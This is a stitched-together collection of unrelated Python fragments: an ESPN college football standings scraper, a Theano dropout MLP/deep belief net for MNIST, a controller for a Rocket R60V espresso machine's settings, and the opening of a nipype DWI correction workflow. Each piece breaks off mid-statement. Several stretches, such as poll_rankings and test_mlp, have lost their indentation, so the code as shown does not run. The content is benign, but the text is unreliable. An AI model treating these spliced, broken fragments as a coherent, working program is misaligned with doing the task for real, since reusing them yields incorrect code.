                        team_list.append(row.find('span', class_='team-names').text)
                        # Pull stat information
                        team_cols = row.findAll('td', {'style':'white-space:no-wrap;'})
                        for team_col in team_cols:
                            team_list.append(team_col.text)
                        # Add in the year we're scraping
                        team_list.append(str(year))
                # If we scraped a team's row, add it to the division list
                if len(team_list) > 0:
                    division_list.append(team_list)
            # Add the division list to the overall standings dataframe
            # NOTE(review): DataFrame.append is deprecated in modern pandas;
            # pd.concat is the current equivalent.
            dfStandingsYear = dfStandingsYear.append(pd.DataFrame(division_list), ignore_index=False)
            # Iterate to the next conference in the list
            conf_count += 1
        # Once the dataframe has been created, add in column-names
        dfStandingsYear.columns = column_names
        # Split the Division names such that we only retain the actual name
        # (i.e. `East` or `West` vice `Big Ten - East` or `Big Ten - West`)
        dfStandingsYear.Division = dfStandingsYear.Division.str.split(' - ').apply(lambda x: x[0] if len(x) == 1 else x[1])
        # Remove the word `Conference` from Conference names
        dfStandingsYear.Conference = dfStandingsYear.Conference.str.replace(' Conference', '')
        # Split Conference Records into separate `Wins` and `Losses` columns
        dfStandingsYear[['Conf W','Conf L']] = dfStandingsYear.CONF.str.split('-', expand=True, n=1)
        # Split Overall Records into separate `Wins` and `Losses` columns
        dfStandingsYear[['Over W','Over L']] = dfStandingsYear.OVER.str.split('-', expand=True, n=1)
        # Split Home Records into separate `Wins` and `Losses` columns
        dfStandingsYear[['Home W','Home L']] = dfStandingsYear.HOME.str.split('-', expand=True, n=1)
        # Split Away Records into separate `Wins` and `Losses` columns
        dfStandingsYear[['Away W','Away L']] = dfStandingsYear.AWAY.str.split('-', expand=True, n=1)
        # Split Records vs AP Top 25 into separate `Wins` and `Losses` columns
        dfStandingsYear[['AP W', 'AP L']] = dfStandingsYear.AP.str.split('-', expand=True, n=1)
        # Split Records vs USA Top 25 into separate `Wins` and `Losses` columns
        dfStandingsYear[['USA W', 'USA L']] = dfStandingsYear.USA.str.split('-', expand=True, n=1)
        # Reorder all the columns in a preferable manner
        dfStandingsYear = dfStandingsYear[['Conference','Division','School','Conf W','Conf L','Conf PF',
                                           'Conf PA','Over W','Over L','Over PF','Over PA','Home W',
                                           'Home L','Away W','Away L','STRK','AP W','AP L','USA W','USA L','Year']]
        # Write Conference Standings to a CSV file
        filename = 'Conf Standings/conf_standings_' + str(year) + '.csv'
        dfStandingsYear.to_csv(filename, index=False)
        # Append current year rankings to master dfStandings dataframe
        dfStandingsAll = dfStandingsAll.append(dfStandingsYear)
    # Write CSV containing all Years
    dfStandingsAll.to_csv('Conf Standings/conf_standings_ALL.csv', index=False)
    return dfStandingsAll
def poll_rankings(year=0):
''' This function will scrape the ESPN College Football API
and return all rankings for the specified year. Rankings returned will
be based on the year specified in the input.
The function will also output a CSV file(s) to the `Poll Rankings` folder.
- each year will result in a separate file
Years are currently limited to 2002 to PRESENT on ESPN.com.
Input:
year (int) - the year of the season being requested
* the default value of 0 will request all available years
Output:
1.) A dictionary which contains the ranking for the specifc year.
Exact rankings that will be returned depend on the year requested:
- 2002 to 2006:
* AP Poll
- 2007 to 2013:
* AP Poll, BCS Rankings***
*** BCS Rankings are only available beginning in week 9
- 2014 to PRESENT:
* AP Poll, CFP Rankings***
*** The CFP Rankings are only available beginning in week 10
2.) A CSV file for each year that is scraped containing all the data
in each dictionary and is then exported to the Data/Poll Rankings folder.
'''
# Scrape the main rankings page to establish links for specific weeks/years
soup = site_to_soup("http://www.espn.com/college-football/rankings")
# Grab Year Information
menu = soup.find('ul', class_='dropdown-menu med')
years_list = []
years = menu.select('li')
for li in years:
years_list.append(li.text)
# Determine what years should be scraped:
# If the user did not enter or a number or entered 0, grab all years.
# Otherwise, confirm the year that the user entered is available for
# scraping and then only grab that year.
if str(year) == '0':
pass
elif | |
"""
Deep Belief Net for MINST dataset
DBN uses the code found at: https://github.com/mdenil/dropout with modifications
Modified by <NAME>
Additional Modifications by <NAME>, <NAME>, <NAME>
Date: July 20, 2016
"""
import numpy as np
import pickle
import os, sys
import time
import matplotlib.pyplot as plt
from collections import OrderedDict
sys.path.append('/usr/local/lib/python2.7/dist-packages')
#sys.path.remove('/hanaconda/lib/python2.7/site-packages')
import theano
import theano.tensor as T
from theano.ifelse import ifelse
import theano.printing
import theano.tensor.shared_randomstreams
sys.path.append('anaconda/lib/python2.7/site-packages')
#sys.path.append('/home/xing/Documents/DBN/Glorot and Bengio/MINST')
from logistic_sgd import LogisticRegression
##################################
## Various activation functions ##
##################################
#### rectified linear unit
def ReLU(x):
    """Rectified linear activation."""
    return T.nnet.relu(x)
#### sigmoid
def Sigmoid(x):
    """Logistic sigmoid activation."""
    return T.nnet.sigmoid(x)
#### tanh
def Tanh(x):
    """Hyperbolic tangent activation."""
    return T.tanh(x)
def load_data(dataset):
    ''' Loads the dataset, shuffles it, splits it into a 150-example
    training set and a test set, and wraps both in Theano shared variables.

    :type dataset: string
    :param dataset: path to a pickle file of (input, label) pairs
    '''
    #############
    # LOAD DATA #
    #############
    # Python-2 print statement; file targets Python 2.7 (see sys.path above).
    print '... loading data'
    all_data = pickle.load(open(dataset,"r"))
    #Important: to shuffle the dataset (fixed seed => reproducible split)
    rng = np.random.RandomState(111)
    rng.shuffle(all_data)
    #pick up the number of training cases
    number_of_training = 150
    training_data = [];training_labels = []
    testing_data = []; testing_labels = []
    # First 150 shuffled examples train, the rest test.
    for datapoint in all_data[:number_of_training]:
        training_data.append(datapoint[0])
        training_labels.append(datapoint[1])
    for datapoint in all_data[number_of_training:]:
        testing_data.append(datapoint[0])
        testing_labels.append(datapoint[1])
    training_data = np.asarray(training_data)
    training_labels = np.asarray(training_labels)
    testing_data = np.asarray(testing_data)
    testing_labels = np.asarray(testing_labels)
    # print training_data[:5]
    # zip + unzip converts (data, labels) arrays into the
    # tuple(inputs, targets) layout that shared_dataset expects.
    train_set = zip(training_data,training_labels)
    test_set = zip(testing_data,testing_labels)
    train_set = tuple(zip(*train_set))
    test_set = tuple(zip(*test_set))
    #train_set, valid_set, test_set format: tuple(input, target)
    #input is an numpy.ndarray of 2 dimensions (a matrix)
    #which rows correspond to an example. target is a
    #numpy.ndarray of 1 dimensions (vector) that has the same length as
    #the number of rows in the input. It should give the target
    #to the example with the same index in the input.
    def shared_dataset(data_xy, borrow=True):
        """ Function that loads the dataset into shared variables

        The reason we store our dataset in shared variables is to allow
        Theano to copy it into the GPU memory (when code is run on GPU).
        Since copying data into the GPU is slow, copying a minibatch everytime
        is needed (the default behaviour if the data is not in a shared
        variable) would lead to a large decrease in performance.
        """
        data_x, data_y = data_xy
        shared_x = theano.shared(np.asarray(data_x,
                                            dtype=theano.config.floatX),
                                 borrow=borrow)
        shared_y = theano.shared(np.asarray(data_y,
                                            dtype=theano.config.floatX),
                                 borrow=borrow)
        # When storing data on the GPU it has to be stored as floats
        # therefore we will store the labels as ``floatX`` as well
        # (``shared_y`` does exactly that). But during our computations
        # we need them as ints (we use labels as index, and if they are
        # floats it doesn't make sense) therefore instead of returning
        # ``shared_y`` we will have to cast it to int. This little hack
        # lets us get around this issue
        return shared_x, T.cast(shared_y, 'int32')
    test_set_x, test_set_y = shared_dataset(test_set)
    train_set_x, train_set_y = shared_dataset(train_set)
    rval = [(train_set_x, train_set_y), (test_set_x, test_set_y)]
    return rval
class HiddenLayer(object):
    """Fully-connected layer: output = activation(dot(input, W) [+ b]).

    W is initialized with Xavier/Glorot uniform sampling when
    Type == 'Xavier', otherwise with scaled (0.01) standard normals.
    """
    def __init__(self, rng, input, n_in, n_out,
                 activation, W=None, b=None, Type = 'Xavier',
                 use_bias=False):
        self.input = input
        self.activation = activation

        if W is None:
            if Type == 'Xavier':
                # Glorot/Bengio uniform range: +-sqrt(6 / (fan_in + fan_out))
                W_values = np.asarray(rng.uniform(
                        low=-np.sqrt(6. / (n_in + n_out)),
                        high=np.sqrt(6. / (n_in + n_out)),
                        size=(n_in, n_out)
                    ),
                    dtype=theano.config.floatX)
                W = theano.shared(value=W_values, name='W')
            else:
                # Small gaussian initialization
                W_values = np.asarray(0.01 * rng.standard_normal(
                    size=(n_in, n_out)), dtype=theano.config.floatX)
                W = theano.shared(value=W_values, name='W')

        if b is None:
            b_values = np.zeros((n_out,), dtype=theano.config.floatX)
            b = theano.shared(value=b_values, name='b')

        self.W = W
        self.b = b

        # Bias is only added when use_bias is set (default False here).
        if use_bias:
            lin_output = T.dot(input, self.W) + self.b
        else:
            lin_output = T.dot(input, self.W)

        # activation=None makes this a linear layer.
        self.output = (lin_output if activation is None else activation(lin_output))

        # parameters of the model
        if use_bias:
            self.params = [self.W, self.b]
        else:
            self.params = [self.W]
def _dropout_from_layer(rng, layer, p):
    """Apply a random binary dropout mask to *layer*.

    p is the probability of dropping a unit.
    """
    srng = theano.tensor.shared_randomstreams.RandomStreams(
            rng.randint(999999))
    # p=1-p because 1's indicate keep and p is prob of dropping
    mask = srng.binomial(n=1, p=1-p, size=layer.shape)
    # The cast is important because
    # int * float32 = float64 which pulls things off the gpu
    output = layer * T.cast(mask, theano.config.floatX)
    return output
class DropoutHiddenLayer(HiddenLayer):
    """HiddenLayer whose output has dropout applied at *dropout_rate*."""
    def __init__(self, rng, input, n_in, n_out,
                 activation, dropout_rate, use_bias, W=None, b=None):
        super(DropoutHiddenLayer, self).__init__(
                rng=rng, input=input, n_in=n_in, n_out=n_out, W=W, b=b,
                activation=activation, use_bias=use_bias)
        # Replace the deterministic output with its dropped-out version.
        self.output = _dropout_from_layer(rng, self.output, p=dropout_rate)
class MLP(object):
    """A multilayer perceptron with all the trappings required to do dropout
    training.

    Builds two parallel computation paths sharing the same weights:
    ``dropout_layers`` (with dropout, used for training) and ``layers``
    (weights scaled by 1-p, used for evaluation).
    """
    def __init__(self,
            rng,
            input,
            layer_sizes,
            dropout_rates,
            activations,
            use_bias=True):

        #rectified_linear_activation = lambda x: T.maximum(0.0, x)

        # Set up all the hidden layers
        # (Python 2: zip returns a list, so slicing below works.)
        weight_matrix_sizes = zip(layer_sizes, layer_sizes[1:])
        self.layers = []
        self.dropout_layers = []
        next_layer_input = input
        #first_layer = True
        # dropout the input
        next_dropout_layer_input = _dropout_from_layer(rng, input, p=dropout_rates[0])
        layer_counter = 0
        for n_in, n_out in weight_matrix_sizes[:-1]:
            next_dropout_layer = DropoutHiddenLayer(rng=rng,
                    input=next_dropout_layer_input,
                    activation=activations[layer_counter],
                    n_in=n_in, n_out=n_out, use_bias=use_bias,
                    dropout_rate=dropout_rates[layer_counter + 1])
            self.dropout_layers.append(next_dropout_layer)
            next_dropout_layer_input = next_dropout_layer.output

            # Reuse the paramters from the dropout layer here, in a different
            # path through the graph.
            next_layer = HiddenLayer(rng=rng,
                    input=next_layer_input,
                    activation=activations[layer_counter],
                    # scale the weight matrix W with (1-p)
                    W=next_dropout_layer.W * (1 - dropout_rates[layer_counter]),
                    b=next_dropout_layer.b,
                    n_in=n_in, n_out=n_out,
                    use_bias=use_bias)
            self.layers.append(next_layer)
            next_layer_input = next_layer.output
            #first_layer = False
            layer_counter += 1

        # Set up the output layer
        n_in, n_out = weight_matrix_sizes[-1]
        dropout_output_layer = LogisticRegression(
                rng,
                input=next_dropout_layer_input,
                n_in=n_in, n_out=n_out, use_bias=use_bias)
        self.dropout_layers.append(dropout_output_layer)

        # Again, reuse paramters in the dropout output.
        output_layer = LogisticRegression(
                rng,
                input=next_layer_input,
                # scale the weight matrix W with (1-p)
                W=dropout_output_layer.W * (1 - dropout_rates[-1]),
                b=dropout_output_layer.b,
                n_in=n_in, n_out=n_out, use_bias=use_bias)
        self.layers.append(output_layer)

        # Use the negative log likelihood of the logistic regression layer as
        # the objective.
        self.dropout_negative_log_likelihood = self.dropout_layers[-1].negative_log_likelihood
        self.dropout_errors = self.dropout_layers[-1].errors

        self.negative_log_likelihood = self.layers[-1].negative_log_likelihood
        self.errors = self.layers[-1].errors

        # Grab all the parameters together.
        self.params = [ param for layer in self.dropout_layers for param in layer.params ]
def test_mlp(
initial_learning_rate,
learning_rate_decay,
squared_filter_length_limit,
n_epochs,
batch_size,
mom_params,
activations,
dropout,
dropout_rates,
results_file_name,
layer_sizes,
dataset,
use_bias,
random_seed,
decay=True,
momentum=True,
L2=True,
plot = False):
"""
The dataset is the one from the mlp demo on deeplearning.net. This training
function is lifted from there almost exactly.
:type dataset: string
:param dataset: the path of the MNIST dataset file from
http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz
"""
assert len(layer_sizes) - 1 == len(dropout_rates)
# extract the params for momentum
mom_start = mom_params["start"]
mom_end = mom_params["end"]
mom_epoch_interval = mom_params["interval"]
datasets = load_data(dataset)
train_set_x, train_set_y = datasets[0]
test_set_x, test_set_y = datasets[1]
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
n_test_batches = test_set_x.get_value(borrow=True).shape[0] / batch_size
######################
# BUILD ACTUAL MODEL #
######################
print '... building the model'
# allocate symbolic variables for the data
index = T.lscalar() # index to a [mini]batch
epoch = T.scalar()
x = T.matrix('x') # the data is presented as rasterized images
y = T.ivector('y') # the labels are presented as 1D vector of
# [int] labels
learning_rate = theano.shared(np.asarray(initial_learning_rate,
dtype=theano.config.floatX))
rng = np.random.RandomState(random_seed)
# construct the MLP class
classifier = MLP(rng=rng, input=x,
layer_sizes=layer_sizes,
dropout_rates=dropout_rates,
activations=activations,
use_bias=use_bias)
# Build the expresson for the cost function.
if L2:
lamb = 0.00000001
cost = classifier.negative_log_likelihood(y)
dropout_cost = classifier.dropout_negative_log_likelihood(y)
if use_bias:
cost += lamb * sum([(classifier.params[i]**2).sum() for i in range(0,len(classifier.params),2)])/2*batch_size
dropout_cost += lamb * sum([(classifier.params[i]**2).sum() for i in range(0,len(classifier.params),2)])/2*batch_size
else:
cost += lamb *sum([(param**2).sum() for param in classifier.params])/2*batch_size
dropout_cost += lamb *sum([(param**2).sum() for param in classifier.params])/2*batch_size
else:
cost = classifier.negative_log_likelihood(y)
dropout_cost = classifier.dropout_negative_log_likelihood(y)
# Compile theano function for testing.
test_model = theano.function(inputs=[index],
outputs=classifier.errors(y),
givens={
x: test_set_x[index * batch_size:(index + 1) * batch_size],
y: test_set_y[index * batch_size:(index + 1) * batch_size]})
#theano.printing.pydotprint(test_model, outfile="test_file.png",
# var_with_name_simple=True)
# Compute gradients of the model wrt parameters
gparams = []
for param in classifier.params:
# Use the right cost function here to train with or without dropout.
gparam = T.grad(dropout_cost if dropout else cost, param)
gparams.append(gparam)
if momentum:
print >> sys.stderr, ("Using momentum")
# ... and allocate mmeory for momentum'd versions of the gradient
gparams_mom = []
for param in classifier.params:
gparam_mom = theano.shared(np.zeros(param.get_value(borrow=True).shape,
dtype=theano.config.floatX))
gparams_mom.append(gparam_mom)
# Compute momentum for the current epoch
mom = ifelse(epoch < mom_epoch_interval,
mom_start*(1.0 - epoch/mom_epoch_interval) + mom_end*(epoch/mom_epoch_interval),
mom_end)
# Update the step direction using momentum
updates = OrderedDict()
for gparam_mom, gparam in zip(gparams_mom, gparams):
# <NAME>'s original version
#updates[gparam_mom] = mom * gparam_mom + (1. - mom) * gparam
# change the update rule to match Hinton's dropout paper
updates[gparam_mom] = mom * gparam_mom - (1. - mom) * learning_rate * | |
#!/usr/bin/env python3
from api import api
from api import critical
import argparse
import logging
from logging.handlers import RotatingFileHandler
import numpy as np
import os
import re
import sys
import time
# create logger with 'rocket'
logger = logging.getLogger('rocket')
logger.setLevel(logging.DEBUG)
# create path of log file
path = os.path.dirname(os.path.realpath(__file__)) + '/logs/session.log'
# rotating session logs: perform a rollover before the next session begins,
# so the previous session's log is kept as a numbered backup
fh = RotatingFileHandler(path, mode='a', backupCount=10)
fh.doRollover()
# create file handler which logs even debug messages
# (a fresh handler in mode 'w' replaces the one used only for the rollover)
fh = RotatingFileHandler(path, mode='w', backupCount=10)
fh.setLevel(logging.DEBUG)
# create console handler with a higher log level
sh = logging.StreamHandler(stream=sys.stdout)
sh.setLevel(logging.WARNING)
# create formatters and add them to the handlers
form_fh = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', '%H:%M:%S')
form_sh = logging.Formatter('%(name)s - %(levelname)s - %(message)s')
fh.setFormatter(form_fh)
sh.setFormatter(form_sh)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(sh)
# set default pressure profiles
# NOTE(review): these values disagree with the defaults listed in the CLI
# help text below (profiles B and C appear swapped there, and the
# assignments here are ordered A, C, B) — confirm which mapping is correct.
DefaultProfileA = np.array([[6, 4], [18, 9], [6, 5], [0, 0], [0, 0]])
DefaultProfileC = np.array([[20, 9], [10, 5], [0, 0], [0, 0], [0, 0]])
DefaultProfileB = np.array([[8, 4], [22, 9], [0, 0], [0, 0], [0, 0]])
class state:
    """Typed view of the Rocket R60V espresso machine's settings memory.

    Every property maps to a byte (or byte range) of the machine's
    settings block and is read/written live through the TCP ``api``
    wrapper.  Setters validate first: enumerated values log a warning
    when invalid; numeric values abort via ``critical()`` when out of
    range.

    Fixes vs. previous revision: removed the unused ``err``/``bValid``
    locals in ``_check_profile`` and corrected its misleading
    "check temperature" comment (the value checked is a time).
    """

    # BYTE 0: temperature unit
    __TemperatureUnit = ['Celsius', 'Fahrenheit']

    def _set_temperatureUnit(self, x):
        if x not in self.__TemperatureUnit:
            self._log.warning('"{}" is not valid. Choose one of: {}!'.format(x, self.__TemperatureUnit))
        else:
            self._api.write(0, self.__TemperatureUnit.index(x))

    temperatureUnit = property(
        fset=_set_temperatureUnit,
        fget=lambda self: self.__TemperatureUnit[self._api.read(0)],
        fdel=None,
        doc='Unit of temperature: Celsius/Fahrenheit')

    # BYTE 1: language
    __Language = ['English', 'German', 'French', 'Italian']

    def _set_language(self, x):
        if x not in self.__Language:
            self._log.warning('"{}" is not valid. Choose one of: {}!'.format(x, self.__Language))
        else:
            self._api.write(1, self.__Language.index(x))

    language = property(
        fset=_set_language,
        fget=lambda self: self.__Language[self._api.read(1)],
        fdel=None,
        doc='Selected language: English/German/French/Italian')

    # BYTE 2: coffee temperature
    # coffee boiler in degree Celsius
    __Coffee_temp_C = [85, 115]
    # coffee boiler in degree Fahrenheit
    __Coffee_temp_F = [185, 239]

    def _set_coffeeTemperature(self, x):
        # Valid range depends on the currently configured unit.
        unit = self.temperatureUnit
        if unit == 'Celsius':
            self._check_range(x, self.__Coffee_temp_C, 'Temperature ')
        elif unit == 'Fahrenheit':
            self._check_range(x, self.__Coffee_temp_F, 'Temperature ')
        else:
            self._log.error('Temperature unit has a wrong state "{}"'.format(unit))
            return
        self._api.write(2, x)

    coffeeTemperature = property(
        fset=_set_coffeeTemperature,
        fget=lambda self: self._api.read(2),
        fdel=None,
        doc='Temperature (in F or C) of coffee boiler: 85...115 °C')

    # BYTE 3: steam temperature
    # steam boiler in degree Celsius
    __Steam_temp_C = [115, 125]
    # steam boiler in degree Fahrenheit
    __Steam_temp_F = [239, 257]

    def _set_steamTemperature(self, x):
        unit = self.temperatureUnit
        if unit == 'Celsius':
            self._check_range(x, self.__Steam_temp_C, 'Temperature ')
        elif unit == 'Fahrenheit':
            self._check_range(x, self.__Steam_temp_F, 'Temperature ')
        else:
            self._log.error('Temperature unit has a wrong state "{}"'.format(unit))
            return
        self._api.write(3, x)

    steamTemperature = property(
        fset=_set_steamTemperature,
        fget=lambda self: self._api.read(3),
        fdel=None,
        doc='Temperature (in F or C) of steam boiler: 115...125 °C')

    # BYTE 4: coffeePID  # 4-5, 10-11, 16-17
    coffeePID = property(
        fset=None,
        fget=lambda self: self._read_PID(4),
        fdel=None,
        doc='')

    # BYTE 6: groupPID  # 6-7, 12-13, 18-19
    groupPID = property(
        fset=None,
        fget=lambda self: self._read_PID(6),
        fdel=None,
        doc='')

    # BYTE 8: mysteryPID  # 8-9, 14-15, 20-21
    mysteryPID = property(
        fset=None,
        fget=lambda self: self._read_PID(8),
        fdel=None,
        doc='')

    # BYTE 22: pressure profile A  # 22-36
    def _set_pressureA(self, profile):
        self._check_profile(profile)
        self._write_profile(22, profile)

    pressureA = property(
        fset=_set_pressureA,
        fget=lambda self: self._read_profile(22),
        fdel=None,
        doc='Pressure profile A - 5 times [seconds, bars]')

    # BYTE 38: pressure profile B  # 38-52
    def _set_pressureB(self, profile):
        self._check_profile(profile)
        self._write_profile(38, profile)

    pressureB = property(
        fset=_set_pressureB,
        fget=lambda self: self._read_profile(38),
        fdel=None,
        doc='Pressure profile B - 5 times [seconds, bars]')

    # BYTE 54: pressure profile C  # 54-68
    def _set_pressureC(self, profile):
        self._check_profile(profile)
        self._write_profile(54, profile)

    pressureC = property(
        fset=_set_pressureC,
        fget=lambda self: self._read_profile(54),
        fdel=None,
        doc='Pressure profile C - 5 times [seconds, bars]')

    # BYTE 70: water source
    __WaterSource = ['PlumbedIn', 'Tank']

    def _set_waterSource(self, x):
        if x not in self.__WaterSource:
            self._log.warning('"{}" is not valid. Choose one of: {}!'.format(x, self.__WaterSource))
        else:
            self._api.write(70, self.__WaterSource.index(x))

    waterSource = property(
        fset=_set_waterSource,
        fget=lambda self: self.__WaterSource[self._api.read(70)],
        fdel=None,
        doc='Selected water source: "plumbed in" or "tank"')

    # BYTE 71: active profile
    __ActiveProfile = ['A', 'B', 'C']

    def _set_activeProfile(self, x):
        if x not in self.__ActiveProfile:
            self._log.warning('"{}" is not valid. Choose one of: {}!'.format(x, self.__ActiveProfile))
        else:
            self._api.write(71, self.__ActiveProfile.index(x))

    activeProfile = property(
        fset=_set_activeProfile,
        fget=lambda self: self.__ActiveProfile[self._api.read(71)],
        fdel=None,
        doc='Selected profile for next run.')

    # BYTE 72: steam clean time
    steamCleanTime = property(
        fset=None,
        fget=lambda self: self._api.read(72),
        fdel=None,
        doc='')

    # BYTE 73: is service boiler on
    def _set_isServiceBoilerOn(self, x):
        if not isinstance(x, bool):
            self._log.warning('"{}" is not valid. Choose a boolean!'.format(x))
        else:
            self._api.write(73, x)

    isServiceBoilerOn = property(
        fset=_set_isServiceBoilerOn,
        fget=lambda self: self._api.read(73) == 1,
        fdel=None,
        doc='Status of steam (aka service) boiler: on/off')

    # BYTE 74: is machine in standby
    def _set_isMachineInStandby(self, x):
        if not isinstance(x, bool):
            self._log.warning('"{}" is not valid. Choose a boolean!'.format(x))
        else:
            self._api.write(74, x)

    isMachineInStandby = property(
        fset=_set_isMachineInStandby,
        fget=lambda self: self._api.read(74) == 1,
        fdel=None,
        doc='Standby mode of R60V: on/off')

    # BYTE 75: NOT TESTED coffee cycles subtotal  # 75-76
    coffeeCyclesSubtotal = property(
        fset=None,
        fget=lambda self: [self._api.read(75), self._api.read(76)],
        fdel=None,
        doc='')

    # BYTE 77: NOT TESTED coffee cycles total  # 77-80
    coffeeCyclesTotal = property(
        fset=None,
        fget=lambda self: [self._api.read(idx) for idx in range(77, 81)],
        fdel=None,
        doc='')

    # BYTE 81: NOT TESTED auto on time  # 81-82
    autoOnTime = property(
        fset=None,
        fget=lambda self: [self._api.read(81), self._api.read(82)],
        fdel=None,
        doc='')

    # BYTE 83: NOT TESTED auto standby time  # 83-84
    autoStandbyTime = property(
        fset=None,
        fget=lambda self: [self._api.read(83), self._api.read(84)],
        fdel=None,
        doc='')

    # BYTE 85: NOT TESTED auto skip day
    autoSkipDay = property(
        fset=None,
        fget=lambda self: self._api.read(85),
        fdel=None,
        doc='')

    def __init__(self, machine_ip='192.168.1.1', machine_port=1774):
        """Verify the wifi link to the machine, then open the TCP api."""
        # create logger
        self._log = logging.getLogger('rocket.state')
        # check if RocketEspresso SSID is available
        if re.search('RocketEspresso', os.popen('iwlist wlan0 scan').read()) is not None:
            self._log.debug('SSID "RocketEspresso" found')
        else:
            critical(self._log, 'SSID "RocketEspresso" not found')
        # ip address from DHCP server of R60V?
        if os.popen('ifconfig | grep "192.168.1."').read():
            self._log.debug('ip address from DHCP server of R60V available')
        else:
            critical(self._log, 'no ip address from DHCP server of R60V available')
        # create connection to machine
        self._api = api(machine_ip=machine_ip, machine_port=machine_port)

    def __del__(self):
        # Close the TCP connection when the state object goes away.
        self._log.info('run destructor')
        self._api.close()

    # ### helper functions ###
    def _check_range(self, selected, min_max, pre):
        """Abort via critical() when *selected* lies outside [min, max]."""
        if not(min_max[0] <= selected <= min_max[1]):
            critical(self._log, '{}value "{}" is out of range [{} ... {}]!'.format(
                pre, selected, min_max[0], min_max[1]))

    def _check_profile(self, profile):
        """Validate all 5 [time, pressure] steps of a pressure profile."""
        # (kind of) protected MIN/MAX values
        Pressure = [0, 14]  # bars
        Time = [0, 60]  # seconds
        # look at each of the 5 settings
        for num in range(5):
            # check time
            self._check_range(profile[num][0], Time, 'Time ')
            # check pressure
            self._check_range(profile[num][1], Pressure, 'Pressure ')

    def _read_profile(self, offset):
        """Read a 5-step pressure profile starting at *offset*.

        Times are stored at offset+0/2/4/6/8, pressures at
        offset+10...offset+14; raw values are deciseconds/decibars and
        are scaled to seconds/bars before being returned.
        """
        profile = np.array([
            [self._api.read(offset + 0), self._api.read(offset + 10)],
            [self._api.read(offset + 2), self._api.read(offset + 11)],
            [self._api.read(offset + 4), self._api.read(offset + 12)],
            [self._api.read(offset + 6), self._api.read(offset + 13)],
            [self._api.read(offset + 8), self._api.read(offset + 14)]])
        self._log.info('received profile (offset={}): {}'.format(offset, profile))
        profile = profile / 10  # decisecond => second, decibar => bar
        return profile

    def _write_profile(self, offset, profile):
        """Write a 5-step profile (seconds/bars) as deciseconds/decibars."""
        p = np.array(profile) * 10
        self._api.write(offset + 0, p[0][0]), self._api.write(offset + 10, p[0][1])
        self._api.write(offset + 2, p[1][0]), self._api.write(offset + 11, p[1][1])
        self._api.write(offset + 4, p[2][0]), self._api.write(offset + 12, p[2][1])
        self._api.write(offset + 6, p[3][0]), self._api.write(offset + 13, p[3][1])
        self._api.write(offset + 8, p[4][0]), self._api.write(offset + 14, p[4][1])

    def _read_PID(self, offset):
        """Read the three PID constants stored 6 bytes apart from *offset*."""
        profile = np.array([
            self._api.read(offset + 0),
            self._api.read(offset + 6),
            self._api.read(offset + 12)])
        return profile
if __name__ == "__main__":
# create logger and set level
log = logging.getLogger('rocket.cli')
# create console handler with a higher log level
sh = logging.StreamHandler(stream=sys.stdout)
sh.setLevel(logging.INFO)
# create formatters and add them to the handlers
form_sh = logging.Formatter('%(name)s - %(levelname)s - %(message)s')
sh.setFormatter(form_sh)
# add the handlers to the logger
log.addHandler(sh)
parser = argparse.ArgumentParser(
description='Command-line tool to read and write data from R60V.',
epilog="""
List of all R60V properties and their possible values ([] means: not writable):
* activeProfile [A/B/C]
* autoOnTime []
* autoSkipDay []
* autoStandbyTime []
* coffeeCyclesSubtotal []
* coffeeCyclesTotal []
* coffeePID []
* coffeeTemperature [105], e.g. 85...115 C or 185...239 F
* groupPID []
* isMachineInStandby [True/False]
* isServiceBoilerOn [True/False]
* language [English/German/French/Italian]
* mysteryPID []
* pressureA default: [[ 6, 4], [18, 9], [6, 5], [0, 0], [0, 0]]
* pressureB default: [[20, 9], [10, 5], [0, 0], [0, 0], [0, 0]]
* pressureC default: [[ 8, 4], [22, 9], [0, 0], [0, 0], [0, 0]]
* steamCleanTime []
* steamTemperature [124], e.g. 115...125 C or 239...257 F
* temperatureUnit [Celsius/Fahrenheit]
* waterSource [PlumbedIn/Tank]
All pressure profiles contain 5 steps with [0...60 seconds, 0...14 bars] in decisecond/-bar precision.
""",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-da', | |
## \author <NAME>
##
## This workflow corrects the susceptibility artifacts of the input DWI data,
## and aligns the corrected data to the corresponding T2 image space.
## Important outputs: CorrectedDWI_in_T2Space, DWIBrainMask
"""
CorrectionWorkflow.py
============================
Description:
The purpose of this is to...
Author:
Usage:
"""
import nipype
import nipype.interfaces.io as nio # Data i/oS
import nipype.pipeline.engine as pe # pypeline engine
from nipype.interfaces import ants
from nipype.interfaces.base import (
CommandLine,
CommandLineInputSpec,
TraitedSpec,
File,
Directory,
)
from nipype.interfaces.base import traits, isdefined, BaseInterface
from nipype.interfaces.semtools import *
from nipype.interfaces.utility import Merge, Split, Function, Rename, IdentityInterface
from utilities.misc import common_ants_registration_settings
def create_correction_workflow(WFname):
"""
This Function takes in...
:param WFname:
:return: CorrectionWF
"""
###### UTILITY FUNCTIONS #######
# \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
# remove the skull from the T2 volume
def extract_brain_from_head(RawScan, BrainLabels):
"""
This function will remove the skull from the T2 volume
:param Rawscan:
:param BrainLabels:
:return:
"""
import os
import SimpleITK as sitk
# Remove skull from the head scan
assert os.path.exists(RawScan), "File not found: %s" % RawScan
assert os.path.exists(BrainLabels), "File not found: %s" % BrainLabels
headImage = sitk.ReadImage(RawScan)
labelsMap = sitk.ReadImage(BrainLabels)
label_mask = labelsMap > 0
brainImage = sitk.Cast(headImage, sitk.sitkInt16) * sitk.Cast(
label_mask, sitk.sitkInt16
)
outputVolume = os.path.realpath("T2Stripped.nrrd")
sitk.WriteImage(brainImage, outputVolume)
return outputVolume
def make_resampled_in_file_list(inputT2, inputLabelMap):
"""
This function..
:param inputT2:
:param inputLabelMap:
:return:
"""
imagesList = [inputT2, inputLabelMap]
return imagesList
# This function helps to pick desirable output from the output list
    def pick_from_file(inlist, item):
        """
        Select a single entry from a list output (used to pick one image
        out of the list produced by a MapNode).

        :param inlist: list to index into
        :param item: integer index of the desired element
        :return: ``inlist[item]``
        """
        return inlist[item]
# Create registration mask for ANTs from resampled label map image
def create_ants_registration_mask(brainMask):
"""
This function will
:param brainmask:
:return:
"""
import os
import SimpleITK as sitk
assert os.path.exists(brainMask), "File not found: %s" % brainMask
labelsMap = sitk.ReadImage(brainMask)
label_mask = labelsMap > 0
# dilate the label mask
dilateFilter = sitk.BinaryDilateImageFilter()
